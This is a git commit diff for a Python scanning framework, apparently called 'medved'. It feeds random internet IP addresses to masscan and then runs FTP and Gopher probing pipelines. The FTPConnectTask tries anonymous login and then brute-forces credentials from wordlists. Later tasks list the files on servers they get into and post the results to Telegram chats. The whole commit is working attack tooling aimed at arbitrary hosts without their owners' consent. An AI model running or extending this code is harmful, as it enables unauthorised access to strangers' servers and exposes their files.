This Is How We Do It

La ra ra ra ra ra
This is how we do it
Alexander 2018-10-10 21:26:13 +03:00 committed by GitHub
commit 10d514e45b
51 changed files with 873 additions and 806 deletions

.pylintrc (new file)

@ -0,0 +1,6 @@
[MASTER]
extension-pkg-whitelist=GeoIP
[FORMAT]
indent-string=' '
indent-after-paren=2


@ -3,6 +3,13 @@
import yaml


class Config(object):
    def __init__(self):
        with open('data/config.yaml') as config_file:
            self.config = yaml.load(config_file)

    def get(self, key, defval=None):
        return self.config.get(key, defval)


cnf = Config()

README.md

@ -2,130 +2,143 @@
alpha beta whatever
partly works
## roadmap
refactor README and lib/plugin/plugins/*
cleanup *
probably Listener should be part of Core in order to supervise everything
tasks don't store results currently; need to implement some validation of performed tasks (at least in the Executor thread before spreading new tasks)
http://python-rq.org/docs/results/
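A rough sketch of how such validation could look through rq's job API (queue names and the `lib.exec.Task.run` entry point are taken from this commit; the validation rule itself is only an assumption):

```python
# Sketch only: how the Executor thread could check a finished job's result
# before spreading follow-up tasks.
from redis import Redis
from rq import Queue

queue = Queue('normal', connection=Redis(host='127.0.0.1'))

job_id = 'previously-enqueued-job-id'   # placeholder: id returned by Queue.enqueue()
job = queue.fetch_job(job_id)
if job is not None and job.result is not None:
    # assumed rule: every item must carry a result for the step before moving on
    ok = all(item['steps'].get('ftp_scan') is not None for item in job.result)
    print('batch valid:', ok)
```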
## configuration
`data/config.yaml`
```
---
dsl_version: 1

core:
  services:
    - random_ip
    - rq_executor
    - tg_feed
  pipelines:
    - ftp
    - gopher

services:
  random_ip:
    package: lib.plugin.base.lib.IP
    service: RandomIP
    storage: ip_source
  rq_executor:
    package: lib.exec.Executor
    service: RQExecutor
    storage: pool
    redis:
      host: "127.0.0.1"
  tg_feed:
    package: lib.plugin.base.lib.Telegram
    service: TelegramFeed
    storage: pool
    token: "mocken"
    chats:
      - id: aiWeipeighah7vufoHa0ieToipooYe
        if:
          steps.ftp_apply_tpl: true
          data.filter: false
      - id: ohl7AeGah5uo8cho4nae9Eemaeyae3
        if:
          steps.gopher_apply_tpl: true
          data.filter: false

storage:
  pool:
    package: lib.plugin.base.lib.Mongo
    service: MongoStorage
    size: 0
    db: "medved"
    coll: 'pool'
  ip_source:
    package: lib.plugin.base.lib.Mongo
    service: MongoStorage
    size: 800
    db: "medved"
    coll: 'ip_source'

pipelines:
  ftp:
    source: ip_source
    steps:
      - task: ftp_scan
        priority: low
        parallel: 100
      - task: ftp_connect
        priority: normal
        if:
          steps.ftp_scan: true
      - task: ftp_list_files
        priority: high
        if:
          steps.ftp_connect: true
      - task: ftp_apply_tpl
        priority: high
        if:
          steps.ftp_list_files: true
  gopher:
    source: ip_source
    steps:
      - task: gopher_scan
        priority: normal
        parallel: 100
      - task: gopher_find
        priority: high
        if:
          steps.gopher_scan: true
      - task: gopher_apply_tpl
        priority: high
        if:
          steps.gopher_find: true
  http:
    source: ip_source
    steps:
      - task: http_scan
        priority: low
        parallel: 25

tasks:
  gopher_scan:
    package: lib.plugin.iscan.tasks.common
    service: MasScanTask
    ports:
      - 70
  gopher_find:
    package: lib.plugin.iscan.tasks.gopher
    service: GopherFindTask
  gopher_apply_tpl:
    package: lib.plugin.base.tasks.text
    service: Jinja2TemplateTask
    path: lib/plugin/iscan/templates/gopher.tpl
  ftp_scan:
    package: lib.plugin.iscan.tasks.common
    service: MasScanTask
    ports:
      - 21
  ftp_connect:
    package: lib.plugin.iscan.tasks.ftp
    service: FTPConnectTask
    logins: data/ftp/logins.txt
    passwords: data/ftp/passwords.txt
    bruteforce: true
    timeout: 15
  ftp_list_files:
    package: lib.plugin.iscan.tasks.ftp
    service: FTPListFilesTask
  ftp_apply_tpl:
    package: lib.plugin.base.tasks.text
    service: Jinja2TemplateTask
    path: lib/plugin/iscan/templates/ftp.tpl

logging:
  Storage: DEBUG
```
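Roughly how these sections are consumed: every `package`/`service` pair is instantiated through `lib.Loader`, e.g. (simplified sketch based on `lib/__init__.py`; it assumes a reachable MongoDB for the storage entries):

```python
# Sketch: turning 'storage' entries from the config above into objects.
from lib import Loader

pool = Loader.by_id('storage', 'pool')            # -> MongoStorage configured from storage.pool
ip_source = Loader.by_id('storage', 'ip_source')  # -> MongoStorage for the IP source queue
print(type(pool).__name__, type(ip_source).__name__)
```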
probably it can be launched with docker, however I didn't test it yet
@ -137,9 +150,10 @@ you'll need working redis and mongodb for default configuration
## top-level services
### sources ###
### feeds ###
### lib.exec.Executor.RQExecutor
Should run pipelines described in configuration. Works via [RedisQueue](http://python-rq.org/), so needs some Redis up and running
Basically takes data from pool and submits it to workers.
RQ workers should be launched separately (`rqworker worker` from code root)
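As an illustration of that hand-off, this is roughly what the executor does with one batch of items and one of the priority queues from the config (`high`/`normal`/`low`); it mirrors the calls in `lib/exec/Executor.py` but is a simplified sketch, not the exact code path, and the sample item is made up:

```python
# Simplified sketch of the pool -> queue hand-off performed by RQExecutor.
from redis import Redis
from rq import Queue

redis_conn = Redis(host='127.0.0.1')
q = Queue('low', connection=redis_conn)                  # priority taken from the step config

# one item shaped the way sources in this commit shape them (illustrative IP)
items = [{'source': 'random_ip', 'steps': {}, 'data': {'ip': '198.51.100.7'}}]

job = q.enqueue('lib.exec.Task.run', 'ftp_scan', items)  # a worker started with
print(job.id, job.get_status())                          # `rq worker high normal low` picks it up
```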


@ -3,110 +3,175 @@ dsl_version: 1
core:
  services:
    - random_ip
    - rq_executor
    - GC
    - tg_feed
  pipelines:
    - ftp
    - gopher

services:
  random_ip:
    package: lib.plugin.base.lib.IP
    service: RandomIP
    storage: ip_source
  rq_executor:
    package: lib.exec.Executor
    service: RQExecutor
    storage: pool
    delay: 2
    redis:
      host: redis
  GC:
    package: lib.plugin.base.lib.GC
    service: GarbageCollector
    storage: pool
    delay: 10
    if:
      steps.ftp_scan: false
      steps.gopher_scan: false
  tg_feed:
    package: lib.plugin.base.lib.Telegram
    service: TelegramFeed
    storage: pool
    token: "358947254:"
    chats:
      - id: aiWeipeighah7vufoHa0ieToipooYe
        if:
          steps.ftp_apply_tpl: true
      - id: ohl7AeGah5uo8cho4nae9Eemaeyae3
        if:
          steps.gopher_apply_tpl: true
          data.filter: false

storage:
  pool:
    package: lib.plugin.base.lib.Mongo
    service: MongoStorage
    url: mongo
    size: 0
    db: "medved"
    coll: 'pool'
  ip_source:
    package: lib.plugin.base.lib.Mongo
    service: MongoStorage
    url: mongo
    size: 800
    db: "medved"
    coll: 'ip_source'

pipelines:
  ftp:
    source: ip_source
    steps:
      - task: ftp_scan
        priority: low
        parallel: 100
      - task: ftp_connect
        priority: normal
        if:
          steps.ftp_scan: true
      - task: ftp_list_files
        priority: normal
        if:
          steps.ftp_connect: true
      - task: ftp_filter_files
        priority: normal
        parallel: 100
        if:
          steps.ftp_list_files: true
      - task: ftp_apply_tpl
        priority: high
        if:
          steps.ftp_filter_files: true
          data.filter: false
  gopher:
    source: ip_source
    steps:
      - task: gopher_scan
        priority: normal
        parallel: 100
      - task: gopher_find
        priority: high
        if:
          steps.gopher_scan: true
      - task: gopher_apply_tpl
        priority: high
        if:
          steps.gopher_find: true
  http:
    source: ip_source
    steps:
      - task: http_scan
        priority: low
        parallel: 25

tasks:
  gopher_scan:
    package: lib.plugin.iscan.tasks.common
    service: MasScanTask
    ports:
      - 70
  gopher_find:
    package: lib.plugin.iscan.tasks.gopher
    service: GopherFindTask
  gopher_apply_tpl:
    package: lib.plugin.base.tasks.text
    service: Jinja2TemplateTask
    path: lib/plugin/iscan/templates/gopher.tpl
  vnc_scan:
    package: lib.plugin.iscan.tasks.common
    service: MasScanTask
    ports:
      - 5900
      - 5901
  vnc_connect:
    package: lib.plugin.iscan.tasks.vnc
    service: VNCConnectTask
    ports:
      - 5900
      - 5901
  http_scan:
    package: lib.plugin.iscan.tasks.common
    service: MasScanTask
    ports: &http_ports
      - 80
      - 81
      - 8080
      - 8081
  http_find:
    package: lib.plugin.iscan.tasks.http
    service: HTTPFindTask
  ftp_scan:
    package: lib.plugin.iscan.tasks.common
    service: MasScanTask
    ports:
      - 21
  ftp_connect:
    package: lib.plugin.iscan.tasks.ftp
    service: FTPConnectTask
    usernames: data/ftp/usernames.txt
    passwords: data/ftp/passwords.txt
    bruteforce: true
    timeout: 15
  ftp_list_files:
    package: lib.plugin.iscan.tasks.ftp
    service: FTPListFilesTask
  ftp_filter_files:
    package: lib.plugin.iscan.tasks.ftp
    service: FTPFilterFilesTask
  ftp_apply_tpl:
    package: lib.plugin.base.tasks.text
    service: Jinja2TemplateTask
    path: lib/plugin/iscan/templates/ftp.tpl

logging:
  Storage: DEBUG


@ -51,6 +51,8 @@ services:
  mongo:
    image: mongo:latest
    command:
      - '--quiet'
    volumes:
      - ./docker/lib/mongo:/data/
    env_file:


@ -7,6 +7,7 @@ export REDIS_IP=$(host ${REDIS_IP} | head -n1 | grep -Po "(\d+\.?){4}")
/tmp/confd -onetime -backend env
#sudo -u tor tor
#cd /mdvd && proxychains -q python3 medved.py
cd /mdvd && python3 medved.py


@ -1,5 +1,16 @@
FROM medved_base:latest

RUN pacman -S --noconfirm --needed git libpcap linux-headers clang tor

RUN git clone https://github.com/robertdavidgraham/masscan && \
    cd masscan && \
    make -j && \
    mv bin/masscan /usr/bin/masscan

RUN wget -N http://geolite.maxmind.com/download/geoip/database/GeoLiteCity.dat.gz && gunzip GeoLiteCity.dat.gz
RUN mkdir -p /usr/share/GeoIP/ && mv GeoLiteCity.dat /usr/share/GeoIP/GeoIPCity.dat

ADD files/run.sh /tmp/run.sh
CMD ["/tmp/run.sh"]


@ -4,4 +4,4 @@ export CORE_IP=$(host ${CORE_IP} | head -n1 | grep -Po "(\d+\.?){4}")
/tmp/confd -onetime -backend env
cd /mdvd && rq worker high normal low -u "redis://${REDIS_IP}:6379/"


@ -1,3 +1,8 @@
"""
Provides Service class
"""
from time import sleep
from threading import Thread
from lib import Logger, Loader, Loadable
@ -9,7 +14,7 @@ class Service(Loadable):
    def __init__(self, thread, id, root=cnf):
        super().__init__(id, root)
        self._data = Loader.by_id('storage', self.lcnf.get("storage"))
        self._stop_timeout = 10
        self._running = False
@ -23,6 +28,7 @@ class Service(Loadable):
        pass

    def start(self):
        """Executes pre_start, starts thread and executes post_start"""
        self._logger.debug('pre_start')
        self._pre_start()
@ -38,6 +44,7 @@ class Service(Loadable):
        self._logger.info('start finished')

    def stop(self):
        """Executes pre_stop, stops thread and executes post_stop"""
        self._logger.debug('pre_stop')
        self._pre_stop()


@ -1,20 +1,8 @@
from lib import Service


class Feed(Service):
    """Base class for datafeeds"""
    def __init__(self, thread, id, root):
        super().__init__(thread, id, root)
        self._logger.add_field('service', 'Feed')
        self._logger.add_field('vname', self.__class__.__name__)

lib/data/Item.py (new file)

@ -0,0 +1,17 @@
class Item(object):
"""Base class for item"""
def __init__(self, source):
self._item = {
'source': source,
'steps': {},
'data': {}
}
def set(self, key, value):
elem = self._item['data']
upd = {}
for x in key.split("."):
elem = elem.get(x, {})
upd[x] = {}
upd[0] = value
self._item['data'].update(upd)


@ -1,61 +0,0 @@
from lib.data import Source, Feed
from time import sleep
from lib import Service, Loader
class DataManager(Service):
"""Actually, we may load feeds, sources and datapools right in core. Not sure that datamanager is required just to pull sources"""
def __init__(self, id, root):
super().__init__(self.__run, id, root)
self._logger.add_field('service', 'DataManager')
self.sources = {}
for s in self.lcnf.get("sources"):
self.attach_source(s)
self.feeds = {}
for f in self.lcnf.get("feeds"):
self.attach_feed(f)
def _pre_start(self):
self._logger.debug('starting sources')
for _,s in self.sources.items():
s.start()
self._logger.debug('starting feeds')
for _,f in self.feeds.items():
f.start()
def _pre_stop(self):
self._logger.debug('stopping sources')
for _,s in self.sources.items():
s.stop()
self._logger.debug('stopping feeds')
for _,f in self.feeds.items():
f.stop()
def attach_source(self, id):
ds = Loader.by_id('sources', id)
self.sources[id] = ds
def attach_feed(self, id):
df = Loader.by_id('feeds', id)
self.feeds[id] = df
def get_source(self, name) -> Source:
return self.sources.get(name)
def get_feed(self, name) -> Feed:
return self.feeds.get(name)
def __run(self):
oneshot = self.lcnf.get("oneshot", 500)
while self._running:
if self._data.count() < oneshot:
while self._running and (self._data.count() + oneshot < self._data.size()):
self._logger.debug("fill %s OF %s", self._data.count(), self._data.size())
for _,source in self.sources.items():
items = source.next(count=oneshot)
if items:
self._data.put(items)
sleep(1)
else:
self._logger.debug('Pool size is ok: %s', self._data.count())
sleep(1)


@ -1,21 +1,22 @@
import copy

from lib import Service


class Source(Service):
    """Base class for datasources"""
    def __init__(self, thread, id, root):
        super().__init__(thread, id, root)
        self._logger.add_field('service', 'Source')
        self._logger.add_field('vname', self.__class__.__name__)
        self._item = {
            'source': self._id,
            'steps': {},
            'data': {}
        }

    def _create(self):
        return copy.deepcopy(self._item)

    def _prepare(self, item):
        pass


@ -1,4 +1,4 @@
import inspect

from lib import Loadable, Logger
@ -7,7 +7,7 @@ class Storage(Loadable):
    def __init__(self, id, root):
        super().__init__(id, root)
        self._size = self.lcnf.get("size", 0)
        self._logger = Logger("Storage")
        self._logger.add_field('vname', self.__class__.__name__)
@ -27,7 +27,9 @@ class Storage(Loadable):
        return items

    def get(self, count=1, block=True, filter=None):
        """Returns items, removing them from storage"""
        self._logger.debug("get|%s|%s|%s",
                           count, block, inspect.stack()[1][0].f_locals["self"].__class__.__name__)
        items = []
        if count == 1:
            items.append(self._get(block, filter))
@ -44,40 +46,37 @@ class Storage(Loadable):
            self._put(i, block)

    def put(self, items, block=True):
        """Puts provided items"""
        self._logger.debug("put|%s|%s|%s",
                           len(items), block, inspect.stack()[1][0].f_locals["self"].__class__.__name__)
        if items:
            items = [i for i in items if i is not None]
            if len(items) == 1:
                self._put(items[0], block)
            elif len(items) > 1:
                self._put_many(items, block)

    def _find(self, filter):
        pass

    def find(self, filter):
        """Returns items without removing them from storage"""
        return self._find(filter)

    def _update(self, items, update):
        pass

    def update(self, items, update=None):
        """Updates provided items"""
        self._logger.debug("update|%s|%s",
                           len(items), inspect.stack()[1][0].f_locals["self"].__class__.__name__)
        if items:
            items = [i for i in items if i is not None]
            self._update(items, update)

    def _remove(self, items):
        pass

    def remove(self, items):
        """Removes provided items"""
        self._remove(items)


@ -1,13 +0,0 @@
from lib import Loadable, Logger
# dunno
class Type(Loadable):
def __init__(self):
self.data = {}
class Host(Type):
def __init__(self):
self.data = {
'ip': ''
}


@ -1,7 +1,6 @@
from .Storage import Storage
from .Source import Source
from .Feed import Feed
from .Item import Item

__all__ = ['Storage', 'Source', 'Feed', 'Item']

lib/exec/Executor.py (new file)

@ -0,0 +1,71 @@
from lib import Service, Loader, Loadable
from time import sleep
from rq import Queue
from redis import Redis
class Executor(Service):
"""Base class for executors"""
def __init__(self, thread, id, root):
super().__init__(thread, id, root)
self._logger.add_field('service', 'Executor')
self._logger.add_field('vname', self.__class__.__name__)
class RQExecutor(Executor):
"""rq (redis queue) executor"""
def __init__(self, id, root):
super().__init__(self.__run, id, root)
def __run(self):
redis_conn = Redis(host=self.lcnf.get('redis').get('host'))
jobs = []
known_sources = {}
while self._running:
sleep(self.lcnf.get('delay', 0.5))
try:
for pn, pipeline in self.cnf.get("pipelines").items():
if pn not in self.cnf.get('core').get('pipelines'):
continue
for step in pipeline['steps']:
q = Queue(step.get('priority', 'normal'), connection=redis_conn)
for job_id in jobs:
job = q.fetch_job(job_id)
if job:
if job.result is not None:
self._logger.debug("%s|%s", job_id, job._status)
self._data.update(job.result)
job.cleanup()
jobs.remove(job_id)
if len(jobs) + 1 > self.lcnf.get('qsize', 200):
continue
filter = {"steps.%s" % step['task']: {'$exists': False}}
filter.update({key: value for key, value in step.get("if", {}).items()})
count = step.get('parallel', 1)
# get as much as possible from own pool
items = self._data.get(block=False, count=count, filter=filter)
# obtain everything else from source
if len(items) < count:
source = None
source_id = pipeline.get('source')
if source_id in known_sources:
source = known_sources[source_id]
else:
source = Loader.by_id('storage', source_id)
known_sources[source_id] = source
new_items = source.get(block=False, count=(count - len(items)), filter=filter)
items.extend(new_items)
source.remove(new_items)
if items:
for i in items:
i['steps'][step['task']] = None
self._data.update(items)
job = q.enqueue("lib.exec.Task.run", step['task'], items)
self._logger.info("%s|%s|%s|%s", job.id, step.get('priority', 'normal'), step['task'], len(items))
jobs.append(job.id)
except Exception as e:
self._logger.error("Error in executor main thread: %s", e)

lib/exec/Task.py (new file)

@ -0,0 +1,28 @@
from lib import Loadable, Logger, Loader
from Config import cnf
class Task(Loadable):
def __init__(self, id, root):
super().__init__(id, root)
self._logger = Logger(self.__class__.__name__)
def run(self, items):
result = self._run(items)
return result
def _run(self, items):
for item in items:
try:
item['steps'][self._id] = self._process(item)
except Exception as e:
self._logger.debug("Error occured while executing: %s", e)
item['steps'][self._id] = False
return items
def _process(self, item):
return True
def run(task_name, items):
result = Loader.by_id('tasks', task_name).run(items)
return result


@ -1 +1,2 @@
from .Executor import Executor
from .Task import Task


@ -1,54 +0,0 @@
from lib import Service, Loader, Loadable
from lib.tasks.worker import worker
from time import sleep
from rq import Queue
from redis import Redis
class Executor(Service):
"""Base class for executors"""
def __init__(self, thread, id, root):
super().__init__(thread, id, root)
self._logger.add_field('service', 'Executor')
self._logger.add_field('vname', self.__class__.__name__)
class RQExecutor(Executor):
"""rq (redis queue) executor - lightweight; workers placed on different nodes"""
def __init__(self, id, root):
super().__init__(self.__run, id, root)
def __run(self):
while self._running:
try:
redis_conn = Redis(host=self.lcnf.get('redis').get('host'))
q = Queue('worker', connection=redis_conn)
if q.count + 1 > self.lcnf.get('size', 100):
sleep(self.lcnf.get('delay', 2))
continue
for pn, pipeline in self.cnf.get("pipelines").items():
self._logger.debug("pipeline: %s", pn)
for step in pipeline['steps']:
self._logger.debug("step: %s", step['name'])
filter = {
"not_exist": [
pn + '_' + step['name']
],
"exist": [
[tag for tag in step.get("requires")]
]
}
items = []
multiple = step.get('multiple', False)
if multiple != False:
items = self._data.get(block=False, count=multiple, filter=filter)
else:
items = self._data.get(block=False, filter=filter)
if items:
self._logger.debug("enqueueing %s.%s with %s", step['package'], step['service'], items)
q.enqueue("%s.%s" % (step['package'], step['service']), items)
except Exception as e:
self._logger.error(e)


@ -1,7 +0,0 @@
from lib import Loadable
#TODO dunno
class Pipeline(Loadable):
def __init__(self, id, root):
super().__init__(id, root)


@ -1,9 +0,0 @@
import importlib
class Manager:
def __init__(self):
pass
@staticmethod
def get_plugin(name):
return importlib.import_module("lib.plugin.plugins." + name)


@ -1,6 +0,0 @@
THIS PART IS LIKE UNDER CONSTRUCTION
get out
for now
come back later


@ -1,7 +0,0 @@
class Task:
"""Pipelines should consist of tasks??..."""
def __init__(self):
self._data = None
def run(self):
pass


@ -1 +0,0 @@
from .Manager import Manager

lib/plugin/base/lib/GC.py (new file)

@ -0,0 +1,25 @@
"""
Provides garbage collector
"""
from time import sleep
from lib import Service
class GarbageCollector(Service):
"""Simple GarbageCollector, removes items by filter periodically"""
def __init__(self, id, root):
super().__init__(self.__run, id, root)
self._logger.add_field('service', 'GC')
self._logger.add_field('vname', self.__class__.__name__)
def __run(self):
while self._running:
filter = {key: value for key, value in self.lcnf.get("if", {}).items()}
if filter:
items = self._data.find(filter=filter)
self._logger.info("Removing %s items", items.count())
self._data.remove(items)
else:
self._logger.error("Filter is empty!")
sleep(self.lcnf.get('delay', 600))


@ -1,35 +1,51 @@
from time import sleep

import itertools
import random
import socket
import struct

import netaddr
import GeoIP

from lib.data import Source


class IPSource(Source):
    """Base source for IPs, appends data.ip and data.geo"""
    def __init__(self, thread, id, root):
        super().__init__(thread, id, root)
        self._item.update({
            'data': {
                'ip': None,
                'geo': {
                    'country': None,
                    'city': None
                }
            }
        })
        self.geo_ip = GeoIP.open(self.lcnf.get("geoip_dat", "/usr/share/GeoIP/GeoIPCity.dat"),
                                 GeoIP.GEOIP_INDEX_CACHE | GeoIP.GEOIP_CHECK_CACHE)

    def _geoip(self, item):
        geodata = self.geo_ip.record_by_name(item['data']['ip'])
        if geodata:
            if 'country_code3' in geodata and geodata['country_code3']:
                item['data']['geo']['country'] = geodata['country_code3']
            if 'city' in geodata and geodata['city']:
                item['data']['geo']['city'] = geodata['city']

    def _prepare(self, item):
        self._geoip(item)


class IPRange(IPSource):
    """Provides IPs from ranges specified in file"""
    def __init__(self, id, root):
        super().__init__(self.__run, id, root)
        self._iprange = []
        self.load_ip_range()

    def load_ip_range(self):
        """Loads IP ranges from specified path"""
        ip_range = []
        with open(self.lcnf.get('path'), "r") as text:
            for line in text:
@ -40,18 +56,19 @@ class IPRange(IPSource):
                    else:
                        ip_range.append(netaddr.IPNetwork(diap[0]))
                except Exception as e:
                    raise Exception("Error while adding range %s: %s" % (line, e))
        self._iprange = ip_range

    def __run(self):
        npos = 0  # network cursor
        apos = 0  # address cursor
        while self._running:
            try:
                for _ in itertools.repeat(None, self.lcnf.get('oneshot', 200)):
                    item = self._create()
                    if self.lcnf.get('ordered', True):
                        # put currently selected element
                        item['data']['ip'] = str(self._iprange[npos][apos])
                        # rotate next element through networks and addresses
                        if apos + 1 < self._iprange[npos].size:
                            apos += 1
@ -65,13 +82,16 @@ class IPRange(IPSource):
                        else:
                            self.stop()
                    else:
                        item['data']['ip'] = str(random.choice(random.choice(self._iprange)))
                    self._prepare(item)
                    self._data.put(item)
                sleep(self.lcnf.get('delay', 0.5))
            except Exception as err:
                self._logger.warn(err)


class RandomIP(IPSource):
    """Generates completely pseudorandom IPs"""
    def __init__(self, id, root):
        super().__init__(self.__run, id, root)
@ -79,10 +99,13 @@ class RandomIP(IPSource):
        while self._running:
            try:
                items = []
                for _ in itertools.repeat(None, self.lcnf.get("oneshot", 200)):
                    item = self._create()
                    randomip = socket.inet_ntoa(struct.pack('>I', random.randint(1, 0xffffffff)))
                    item['data']['ip'] = str(randomip)
                    self._prepare(item)
                    items.append(item)
                self._data.put(items)
                sleep(self.lcnf.get("delay", 0.2))
            except Exception as err:
                self._logger.warn(err)


@ -1,5 +1,6 @@
from time import sleep

from pymongo import MongoClient

from lib.data import Storage


class MongoStorage(Storage):
@ -17,41 +18,31 @@ class MongoStorage(Storage):
        return self._coll.count()

    def _get(self, block, filter):
        if filter is None:
            filter = {}

        item = self._coll.find_one(filter=filter)
        if block:
            while not item:
                item = self._coll.find_one(filter=filter)
                sleep(1)
        return item

    def _get_many(self, count, block, filter):
        if filter is None:
            filter = {}
        items = self._coll.find(filter=filter, limit=count)
        return items

    def _put(self, item, block):
        if block and self.size() is not 0:
            while self.count() + 1 > self.size():
                self._logger.debug('Collection full: %s of %s', self.count(), self.size())
                sleep(1)
        self._coll.insert_one(item)

    def _put_many(self, items, block):
        if block and self.size() is not 0:
            while self.count() + len(items) > self.size():
                self._logger.debug('Collection full: %s of %s', self.count(), self.size())
                sleep(1)
@ -61,3 +52,14 @@ class MongoStorage(Storage):
        if filter is None:
            filter = {}
        return self._coll.find(filter)

    def _update(self, items, update):
        if update:
            filter = {'_id': {'$in': [item['_id'] for item in items]}}
            self._coll.update_many(filter, update, upsert=True)
        else:
            for item in items:
                self._coll.replace_one({'_id': item['_id']}, item, upsert=True)

    def _remove(self, items):
        self._coll.delete_many({'_id': {'$in': [item['_id'] for item in items]}})


@ -1,9 +1,7 @@
from time import sleep

import telebot

from lib.data import Feed


class TelegramFeed(Feed):
    """Send data to Telegram chat"""
@ -16,24 +14,18 @@ class TelegramFeed(Feed):
        while self._running:
            try:
                for chat in self.lcnf.get("chats"):
                    chat_id = chat.get('id')
                    self._logger.debug(chat_id)
                    filter = {"feed.%s" % self._id: {'$exists': False}}
                    filter.update({key: value for key, value in chat.get("if", {}).items()})
                    items = self._data.get(block=False, count=10, filter=filter)
                    self._logger.debug(items)
                    if items:
                        self._data.update(items, {'$set': {'feed.%s' % self._id: True}})
                        tbot = telebot.TeleBot(self.lcnf.get('token'), threaded=False)
                        for i in items:
                            self._logger.debug("@%s: %s", chat_id, i['data']['message'])
                            tbot.send_message("@" + chat_id, i['data']['message'])
                sleep(delay)
            except Exception as err:
                self._logger.warn(err)


@ -0,0 +1,17 @@
from lib.exec import Task
from jinja2 import Environment, FileSystemLoader
class Jinja2TemplateTask(Task):
def __init__(self, id, root):
super().__init__(id, root)
def _process(self, item):
template = Environment(loader=FileSystemLoader('.')).get_template(self.lcnf.get('path'))
item['data']['message'] = template.render(data = item['data'])
item['steps'][self._id] = True
def _run(self, items):
for item in items:
self._process(item)
return items


@ -1,62 +0,0 @@
plugin:
name: iscan
version: 0.1
pipelines:
FTP:
actions:
- scan
- connect
- metadata
- filetree
df:
Telegram:
action: metadata
chats:
- xai7poozengee2Aen3poMookohthaZ
- aiWeipeighah7vufoHa0ieToipooYe
HTTP:
actions:
- scan
- connect
- metadata
- screenshot
df:
Telegram:
action: screenshot
chats:
- xai7poozengee2Aen3poMookohthaZ
- gohquooFee3duaNaeNuthushoh8di2
Gopher:
actions:
- connect
- collect
df:
Telegram:
action: collect
chats:
- xai7poozengee2Aen3poMookohthaZ
- ohl7AeGah5uo8cho4nae9Eemaeyae3
df:
Telegram:
token: TOKEN
ds:
IPRange:
file: file
Remote:
docker:
services:
selenium:
image: selenium/standalone-chrome:latest
volumes:
- /dev/shm:/dev/shm
environment:
- JAVA_OPTS=-Dselenium.LOGGER.level=WARNING
worker_env:
- SELENIUM_IP=selenium
required_by:
- HTTP


@ -3,23 +3,19 @@
import subprocess
import json

from jsoncomment import JsonComment

from lib.exec import Task


class MasScanTask(Task):
    """Provides data.ports for each of items scanned with masscan"""
    def scan(self, ip_list, port_list, bin_path, opts="-sS -Pn -n --wait 0 --max-rate 5000"):
        """Executes masscan on given IPs/ports"""
        bin_path = bin_path
        opts_list = opts.split(' ')
        port_list = ','.join([str(p) for p in port_list])
        ip_list = ','.join([str(ip) for ip in ip_list])
        process_list = [bin_path]
        process_list.extend(opts_list)
        process_list.extend(['-oJ', '-', '-p'])
        process_list.append(port_list)
        process_list.append(ip_list)
@ -30,29 +26,27 @@ class MasScan:
        result = parser.loads(out)
        return result

    def _run(self, items):
        ip_list = [i['data']['ip'] for i in items]
        port_list = self.lcnf.get("ports")

        self._logger.debug("Starting scan, port_list=%s", port_list)

        hosts = self.scan(ip_list=ip_list,
                          port_list=port_list,
                          bin_path=self.lcnf.get('bin_path', "/usr/bin/masscan"))

        self._logger.debug(hosts)
        hosts = {h['ip']: h for h in hosts}
        for item in items:
            if hosts.get(item['data']['ip']):
                ports = [p['port'] for p in hosts[item['data']['ip']]['ports']]
                if 'ports' in item['data']:
                    item['data']['ports'].extend(ports)
                else:
                    item['data']['ports'] = ports
                item['steps'][self._id] = True
                self._logger.debug("Found %s with open ports %s", item['data']['ip'], ports)
            else:
                item['steps'][self._id] = False
        return items


@ -0,0 +1,91 @@
"""
Basic tasks for FTP services
"""
import ftplib
from lib.exec import Task
class FTPConnectTask(Task): # pylint: disable=too-few-public-methods
"""Tries to connect FTP service with various credentials"""
def _process(self, item):
ftp = ftplib.FTP(host=item['data']['ip'], timeout=self.lcnf.get('timeout', 30))
try:
self._logger.debug('Trying anonymous login')
ftp.login()
except ftplib.error_perm as err:
self._logger.debug('Failed (%s)', err)
else:
self._logger.info('Succeeded with anonymous')
item['data']['username'] = 'anonymous'
item['data']['password'] = ''
return True
if self.lcnf.get('bruteforce', False):
self._logger.debug('Bruteforce enabled, loading usernames and passwords')
usernames = [line.rstrip() for line in open(self.lcnf.get('usernames'), 'r')]
passwords = [line.rstrip() for line in open(self.lcnf.get('passwords'), 'r')]
for username in usernames:
for password in passwords:
self._logger.debug('Checking %s', username + ':' + password)
try:
self._logger.debug('Sending NOOP')
ftp.voidcmd('NOOP')
except IOError as err:
self._logger.debug('IOError occured (%s), attempting to open new connection', err)
ftp = ftplib.FTP(host=item['data']['ip'], timeout=self.lcnf.get('timeout', 30))
try:
self._logger.debug('Trying to log in')
ftp.login(username, password)
except ftplib.error_perm as err:
self._logger.debug('Failed (%s)', err)
continue
else:
self._logger.info('Succeeded with %s', username + ':' + password)
item['data']['username'] = username
item['data']['password'] = password
return True
self._logger.info('Could not connect')
return False
class FTPListFilesTask(Task): # pylint: disable=too-few-public-methods
"""Executes NLST to list files on FTP"""
def _process(self, item):
ftp = ftplib.FTP(host=item['data']['ip'],
user=item['data']['username'],
passwd=item['data']['password'])
filelist = ftp.nlst()
try:
ftp.quit()
except ftplib.Error:
pass
item['data']['files'] = []
for filename in filelist:
item['data']['files'].append(filename)
return True
class FTPFilterFilesTask(Task): # pylint: disable=too-few-public-methods
"""Sets data.filter if FTP contains only junk"""
def _process(self, item):
junk_list = ['incoming', '..', '.ftpquota', '.', 'pub']
files = item['data']['files']
item['data']['filter'] = False
try:
if not files or files[0] == "total 0":
item['data']['filter'] = "Empty"
except IndexError:
pass
if 0 < len(files) <= len(junk_list): # pylint: disable=C1801
match_count = 0
for filename in junk_list:
if filename in files:
match_count += 1
if match_count == len(files):
item['data']['filter'] = "EmptyWithBloatDirs"
return True


@ -0,0 +1,47 @@
"""
Basic tasks for Gopher services
"""
import socket
from lib.exec import Task
class GopherFindTask(Task): # pylint: disable=too-few-public-methods
"""Tries to connect Gopher service"""
@staticmethod
def _recv(sck):
total_data = []
while True:
data = sck.recv(2048)
if not data:
break
total_data.append(data.decode('utf-8'))
return ''.join(total_data)
def _process(self, item):
sock = socket.socket()
sock.settimeout(self.lcnf.get('timeout', 20))
sock.connect((item['data']['ip'], int(70)))
sock.sendall(b'\n\n')
response = self._recv(sock)
sock.close()
self._logger.debug("Parsing result: %s", response)
item['data']['files'] = []
item['data']['filter'] = False
for s in [s for s in response.split("\r\n") if s]:
node = {}
fields = s.split("\t")
self._logger.debug(fields)
node['type'] = fields[0][0]
if len(fields) == 4:
node['name'] = fields[0][1:]
node['path'] = fields[1]
node['serv'] = f"{fields[2]}:{fields[3]}"
